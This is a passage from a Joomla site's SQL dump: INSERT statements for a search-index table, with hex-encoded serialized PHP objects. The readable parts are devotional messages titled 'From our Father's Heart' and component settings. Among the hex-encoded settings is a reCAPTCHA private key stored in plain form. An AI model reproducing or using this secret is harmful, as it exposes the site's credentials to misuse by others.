733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a323a223133223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a31343a224661746865722773204865617274223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a33373a2233393a66726f6d2d6f75722d6661746865722d732d68656172742d30322d30342d32303137223b733a373a22636174736c7567223b733a31363a22353a6661746865722d732d6865617274223b733a363a22617574686f72223b733a393a224c6966656f61736973223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a35353a22636f6d706f6e656e742f6b322f6974656d2f33392d66726f6d2d6f75722d6661746865722d732d68656172742d30322d30342d32303137223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a393a224c6966656f61736973223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a393a224c6966656f61736973223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a31343a224661746865722773204865617274223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a31343a224661746865722773204865617274223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3339223b733a353a22726f757465223b733a37343a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d33393a66726f6d2d6f75722d6661746865722d732d68656172742d30322d30342d32303137223b733a353a227469746c65223b733a33363a2246726f6d206f7572204661746865722773204865617274202830322f30342f3230313729223b733a31313a226465736372697074696f6e223b733a3430313a2220446561726c792042656c6f7665642c20444556454c4f5020464149544820464f522053555045524e41545552414c204c4956494e472121212045766572796f6e65206f6e20746865206561727468206b6e6f777320686f77207468657920676574207468656972206e65656473206d657420616e64207468652077696c6c206f6620476f6420666f7220486973206368696c6472656e20697320746861742077652072656365697665206f7572206e656564732066726f6d2048696d206265636175736520486520697320746865206f6e6c7920756e6661696c696e6720736f7572636520285068692e20343a31393b204570682e20333a3139292e20492077616e7420796f7520746f206b6e6f77207468617420616c6c207468652070726f766973696f6e73206f6620476f6420666f7220796f7572206c6966652063616e206f6e6c792062652072656365697665642062792066616974682c20776865726520796f75206f706572617465206265796f6e6420746865207265616c6d206f66207468652066616d696c6961722e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30342d30322031313a32353a3439223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30342d30322031313a32353a3439223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(265, 'index.php?option=com_k2&view=item&id=41', 'index.php?option=com_k2&view=item&id=41:from-our-father-s-heart-02-04-2017', 'From our Father\'s Heart (21/05/2017)', ' Dearly Beloved of God, Be Confident in God\'s Promise! Don\'t let your trust in the Lord die no matter what happens. Even in the face of negative situations and circumstances which seem unfavourable, never let your confidence in God\'s word and ability die. God is always ever able to do what He said He would do. Even when you are hard pressed and are going through tough times, let your heart stay in God and let your confidence in Him never wave. ', '2017-06-25 14:19:40', 'c8ee68346084d69d77d2a6272f6c30fe', 1, 1, 1, '*', '2017-04-09 13:49:02', '0000-00-00 00:00:00', '2017-04-09 13:49:02', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223431223b733a353a22616c696173223b733a33343a2266726f6d2d6f75722d6661746865722d732d68656172742d30322d30342d32303137223b733a373a2273756d6d617279223b733a3437313a223c703e446561726c792042656c6f766564206f6620476f642c3c2f703e0d0a3c703e426520436f6e666964656e7420696e20476f6427732050726f6d697365213c2f703e0d0a3c703e446f6e2774206c657420796f757220747275737420696e20746865204c6f726420646965206e6f206d617474657220776861742068617070656e732e204576656e20696e207468652066616365206f66206e6567617469766520736974756174696f6e7320616e642063697263756d7374616e636573207768696368207365656d20756e6661766f757261626c652c206e65766572206c657420796f757220636f6e666964656e636520696e20476f64277320776f726420616e64206162696c697479206469652e20476f6420697320616c7761797320657665722061626c6520746f20646f2077686174204865207361696420486520776f756c6420646f2e204576656e207768656e20796f75206172652068617264207072657373656420616e642061726520676f696e67207468726f75676820746f7567682074696d65732c206c657420796f7572206865617274207374617920696e20476f6420616e64206c657420796f757220636f6e666964656e636520696e2048696d206e6576657220776176652e3c2f703e0d0a223b733a343a22626f6479223b733a313738323a220d0a3c703e4162726168616d2073746f6f6420776974682068697320636f6e666964656e636520756e7761766572696e6720696e20476f64207468617420476f64207761732061626c6520746f20676976652068696d206120736f6e2e204576656e207768656e20476f642064656d616e64656420497361616320746f20626520736c6175676874657265642c204162726168616d20636f6e666964656e746c792077656e7420746f20746865206d6f756e7461696e2c2062656c696576696e67207468617420476f64207761732061626c6520746f20726169736520746865206465616420616e642068652068616420616e6f7468657220656e636f756e746572207769746820476f642e3c2f703e0d0a3c703e54686520466174686572206861732073706f6b656e2061206c6f7420746f207573206f7665722074686520796561727320616e642074686f736520776f726473207265666c656374207468652072656c65617365206f662068656176656e206f7665722075732e2047657420616c6c20746865736520776f72647320616e6420707574207468656d206f76657220796f757273656c66206576657279206461792e20436f6e66657373207468656d2c20726563697465207468656d2c206465636c617265207468656d2c207072617920616c6c2074686f73652070726179657220706f696e747320616761696e206173207765206a6f75726e6579206f6e207769746820476f6420616e6420796f752077696c6c207365652065766572797468696e67206265636f6d65207265616c69747920696e20796f7572206c6966652e20546869732077696c6c2064657465726d696e6520686f7720746865206675747572652077696c6c20626520666f7220796f752ec2a03c2f703e0d0a3c703e54686520667574757265206973206c6f6164656420666f7220757320616c72656164792c2062757420697420697320796f757220726573706f6e736962696c69747920746f2061637469766174652074686f736520776f726473206f76657220796f757273656c6620616e6420796f75722066616d696c792e20596f752073686f756c64206461696c7920636f6e666573732074686f736520636f76656e616e747320616e642070726f6d69736573206f76657220796f7572206c6966652e204c657420616c6c20796f757220776f72647320616c69676e20776974682074686520636f76656e616e7473207468617420476f6420686173206d61646520776974682075732e2054686520646576696c2077696c6c2074727920746f206d616b6520796f752063616e63656c20616c6c2074686f736520776f7264732062757420796f75206d75737420616c69676e20796f7572206d6f757468207769746820796f75722070726f706865636965732e205468617420697320796f7572206b657920746f20746865206c69666520476f642068617320707265706172656420666f7220796f7520696e206c6966652ec2a03c2f703e0d0a3c703e42656c6f7665642c207768656e206461792069732061626f757420746f20627265616b2c20746861742773207768656e20746865206e69676874206973206461726b6573742e205768656e206974206c6f6f6b73206c696b6520796f752063616e27742074616b6520697420616e796d6f72652c206a7573742072656d656d626572207768617420476f6420686173207361696420746f20796f7520706572736f6e616c6c79207468726f7567682048697320576f726420616e6420746f2075732061732061206368757263682c207468656e2070757420796f757220636f6e666964656e636520696e207468617420776f72642e20476f6420697320636f6d6d697474656420746f206272696e67696e672077686174204865207361696420746f20706173732e3c2f703e0d0a3c703e446f6e27742070757420796f757220636f6e666964656e636520696e20666c6573682c20696e206d656e206f7220696e207468696e67732e20446f6e2774206576656e2070757420796f757220636f6e666964656e636520696e20796f757273656c662e204a757374206c657420796f757220636f6e666964656e6365207374617920616e642067726f7720696e20476f64277320696d6d75746162696c69747920616e642074686520696d6d75746162696c697479206f662048697320776f72643b2062652070617469656e7420616e64206c65742048696d20776f726b2e3c2f703e0d0a3c703e486562726577732031303a33353c2f703e0d0a3c703e3335205468657265666f726520646f206e6f742063617374206177617920796f757220636f6e666964656e63652c20776869636820686173206772656174207265776172642e3c2f703e0d0a3c703e54696c6c206e657874207765656b2c20676f20616e642077696e2077697468204a657375733c2f703e223b733a353a226361746964223b733a313a2235223b733a31303a22637265617465645f6279223b733a333a22313939223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30352d32312031383a34393a3436223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223